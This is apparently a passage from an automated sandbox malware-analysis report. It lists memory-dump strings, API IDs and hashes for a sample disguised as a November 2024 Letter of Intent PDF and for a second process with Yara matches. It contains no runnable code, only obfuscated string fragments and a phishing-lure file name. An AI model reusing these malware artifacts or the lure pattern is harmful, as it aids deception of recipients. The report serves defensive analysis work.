                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: %%%u$[$]:%u
                                                                                      • API String ID: 48624451-2819853543
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 3446177414-3610490719
                                                                                      APIs
                                                                                      Strings
                                                                                      • LdrpCheckModule, xrefs: 32FFA117
                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 32FFA10F
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 32FFA121
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-161242083
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 3446177414-2283098728
                                                                                      APIs
                                                                                      Strings
                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 330082DE
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 330082E8
                                                                                      • Failed to reallocate the system dirs string !, xrefs: 330082D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-1783798831
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 33007BAC
                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 33007B7F
                                                                                      • RTL: Resource at %p, xrefs: 33007B8E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 0-871070163
                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3300728C
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 330072C1
                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 33007294
                                                                                      • RTL: Resource at %p, xrefs: 330072A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 885266447-605551621
                                                                                      APIs
                                                                                      Strings
                                                                                      • LdrpCheckRedirection, xrefs: 3301488F
                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 33014899
                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 33014888
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                      • API String ID: 3446177414-3154609507
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: %%%u$]:%u
                                                                                      • API String ID: 48624451-3050659472
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Wow64 Emulation Layer
                                                                                      • API String ID: 3446177414-921169906
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: d38e28d433a724ed0d6d1993ce5cfcede0f469f680ae9ae92f44d86c3bb4e694
                                                                                      • Instruction ID: 199f9383e66ceaab5866d8c1a9055e20b3d9eeb2e94f6c056d027b2dad2caa94
                                                                                      • Opcode Fuzzy Hash: d38e28d433a724ed0d6d1993ce5cfcede0f469f680ae9ae92f44d86c3bb4e694
                                                                                      • Instruction Fuzzy Hash: 53710071E003199FEF01DFA8C980ADDBBB5AF48750F5441AAE945FB254D734AA06CFA0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: f7817387437fd18165ff5f4ff6f77452699cb69c170a0ccc1e310cd7d4f1c5b9
                                                                                      • Instruction ID: 2ad998907751d4c45acf682ccd2c70548c8ee4a5591619a630f4f50812d6301a
                                                                                      • Opcode Fuzzy Hash: f7817387437fd18165ff5f4ff6f77452699cb69c170a0ccc1e310cd7d4f1c5b9
                                                                                      • Instruction Fuzzy Hash: 2C518EB47007129FEB08EE18C9A4A19B7F5FF89358B1445ADE906EB718DB74EC41CB80
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 19d9159bae0718f1671020bf93ac1da31982bf64c290aa1667173f48c1219427
                                                                                      • Instruction ID: bcc2bf9b9d284c6d6d121ee33287bed47935335cf2d847d7dfe2ff69fa61c9da
                                                                                      • Opcode Fuzzy Hash: 19d9159bae0718f1671020bf93ac1da31982bf64c290aa1667173f48c1219427
                                                                                      • Instruction Fuzzy Hash: 115123B5E002199FEF04CFA9D845ADDBBF5BF48364F14826AE805BB290D7349902DF54
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                      • String ID:
                                                                                      • API String ID: 4281723722-0
                                                                                      • Opcode ID: 40979228b8d10dae595619fafc7068955b8309de09c63540d12031e9b3500ece
                                                                                      • Instruction ID: 04cc09353bd3064426b7342940ca7dc3131519f87f266d57df10eb0ca2afcc57
                                                                                      • Opcode Fuzzy Hash: 40979228b8d10dae595619fafc7068955b8309de09c63540d12031e9b3500ece
                                                                                      • Instruction Fuzzy Hash: 90312375E01228AFDF11EFA8D885A9DBBF0FB48720F10456AE912BB290DB319901CF54
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: 1f328130e0c5c0d0b72c0914e1f5d473e52182b98e242c24d9551b42944415a2
                                                                                      • Instruction ID: 6a3410b443ba261767889065a24b8f944638140faaf9f23cdc8a1a9f0ce14b82
                                                                                      • Opcode Fuzzy Hash: 1f328130e0c5c0d0b72c0914e1f5d473e52182b98e242c24d9551b42944415a2
                                                                                      • Instruction Fuzzy Hash: 42325874D04369DFEB25CF64C984BEDBBB4BB08304F0048E9D649A7251DBB59A84CF91
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-
                                                                                      • API String ID: 1302938615-2137968064
                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction ID: 885f89a30a2d30bda3f1a8a51320de02ca4e4ef5d27c4332ff3ed8715fff8bc5
                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction Fuzzy Hash: DC91E7B5E002159BEB24CF65D8817AEB7A1EF44764F984E1AEE51EF2C8DB308941C750
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0$Flst
                                                                                      • API String ID: 0-758220159
                                                                                      • Opcode ID: 3319310b4920542ecb16d8e6792587908b3aa7475bbc01e743e54ebc53a847b1
                                                                                      • Instruction ID: 57e298eaab5592e34ba57b2f503bb8a20f3ef74d4affc0f932a17b85b9d7da24
                                                                                      • Opcode Fuzzy Hash: 3319310b4920542ecb16d8e6792587908b3aa7475bbc01e743e54ebc53a847b1
                                                                                      • Instruction Fuzzy Hash: 5051DEB5E00A298FEB15DFA8C48474DFBF4FF40394F14886AD50B9B250EB709985CB80
                                                                                      APIs
                                                                                      Strings
                                                                                      • kLsE, xrefs: 32F90540
                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32F9063D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                      • API String ID: 3446177414-2547482624
                                                                                      • Opcode ID: 43a89014d203b39c8f1a2429583f8186d743c6881d71ddfa2f55d73ada86b86d
                                                                                      • Instruction ID: bf15a89dc493d6d6d1cfdd2e8915fa8b51fcdfc6be8884290a213c64b85b3c10
                                                                                      • Opcode Fuzzy Hash: 43a89014d203b39c8f1a2429583f8186d743c6881d71ddfa2f55d73ada86b86d
                                                                                      • Instruction Fuzzy Hash: DD518AB55047469BE324DF65C5406E7BBE5AF84304F008C3EEBAAC7240EB70A545CF92
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: 0$0
                                                                                      • API String ID: 3446177414-203156872
                                                                                      • Opcode ID: 7c8779bc182e154d596fcaedec977f58fefc3152bd9b59a2ee79b5e0ebb2de20
                                                                                      • Instruction ID: 0421f92a51484483d5017e1cfacd7c4d483dff8db219935a9900e0d9c51e28ba
                                                                                      • Opcode Fuzzy Hash: 7c8779bc182e154d596fcaedec977f58fefc3152bd9b59a2ee79b5e0ebb2de20
                                                                                      • Instruction Fuzzy Hash: 9C414BB66087059FD300CF28C594A1ABBE4BF88758F044D2EFA88DB351D771EA05CB96
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c00aef8b4ea717f83330a6b59e1127d21af55a8d8425148deb57213e1a7f5b87
                                                                                      • Instruction ID: d9e32d51ae2621b8826811b802c62eff9bb7d9dab7f244173730743dbb1d2d4f
                                                                                      • Opcode Fuzzy Hash: c00aef8b4ea717f83330a6b59e1127d21af55a8d8425148deb57213e1a7f5b87
                                                                                      • Instruction Fuzzy Hash: 4F31941165C7F14ED30E836D08B9A75AFC19E5720174EC2EEDADA6F3E3C4888419D3A5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$O$S$\$s
                                                                                      • API String ID: 0-3854637164
                                                                                      • Opcode ID: 54eda02c222112e751670f58001cb171736a82d0dc46eeb2d9d838dec3cb5fc2
                                                                                      • Instruction ID: c079b4fd83ad2273f5ad0f6f75fa3d717e1709dc6ea70bc99b6ca1b6853420ab
                                                                                      • Opcode Fuzzy Hash: 54eda02c222112e751670f58001cb171736a82d0dc46eeb2d9d838dec3cb5fc2
                                                                                      • Instruction Fuzzy Hash: F851C472A01119ABDB10EF94DC89EEEB7B8FF84710F008199ED0967145E7755F44CBA1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }k
                                                                                      • API String ID: 0-19443092
                                                                                      • Opcode ID: 90ddabae83caee90ba8f07e60b0d2c246a2b091e2e473e924b2ce0f982ea90a2
                                                                                      • Instruction ID: 7e3cb305e650997b1fd3dcbb65cd9b799e7e45278c5494d069a62943c33420ca
                                                                                      • Opcode Fuzzy Hash: 90ddabae83caee90ba8f07e60b0d2c246a2b091e2e473e924b2ce0f982ea90a2
                                                                                      • Instruction Fuzzy Hash: 772121F6D0121CAF8B04DFA9D8419EFB7F9FF88200F04426AE919E7200E7705A008BE0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Ti
                                                                                      • API String ID: 0-2875216723
                                                                                      • Opcode ID: 4b7b3692daaa2ba4983ba6515cc65d2cfc2441f71785f482b46809046a36b88f
                                                                                      • Instruction ID: 53acf901ee0038956809b6b5a365bfcd53bad8d9b10f353205243c262ab29f3b
                                                                                      • Opcode Fuzzy Hash: 4b7b3692daaa2ba4983ba6515cc65d2cfc2441f71785f482b46809046a36b88f
                                                                                      • Instruction Fuzzy Hash: ED11D0B6D11219AF8B04DFA9DC409EFBBF9FB48200F14466AED15E7200E7705A148BA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                      • API String ID: 0-3248090998
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                      • API String ID: 0-1002149817
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (osj$+njf$-(-<$:7)0$:7)0$>+nj$?+fw$`b(f$`ibc$b<q:$e4<v$f`b($fsnh$fsnh$fwwk$i(tn$k+fw$ndfs$nhi($ofi`$pbew$sjk,$v:7)$v:7)$wi`+$wknd$wknd
                                                                                      • API String ID: 0-215591994
                                                                                      • Opcode ID: 0b194d7baa0b79d02d3a8831a53e97bd12b6b8c1556c4b45dd9658f9596e750e
                                                                                      • Instruction ID: 136b8746ad64b2ffecbbf1df7ca23b56e2be180c0354d6c52662224f5c05b2ae
                                                                                      • Opcode Fuzzy Hash: 0b194d7baa0b79d02d3a8831a53e97bd12b6b8c1556c4b45dd9658f9596e750e
                                                                                      • Instruction Fuzzy Hash: 653121B0D093899BCF14CFEAEA826DDBF71FB04744F208608D4146B259D7351A22CF96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
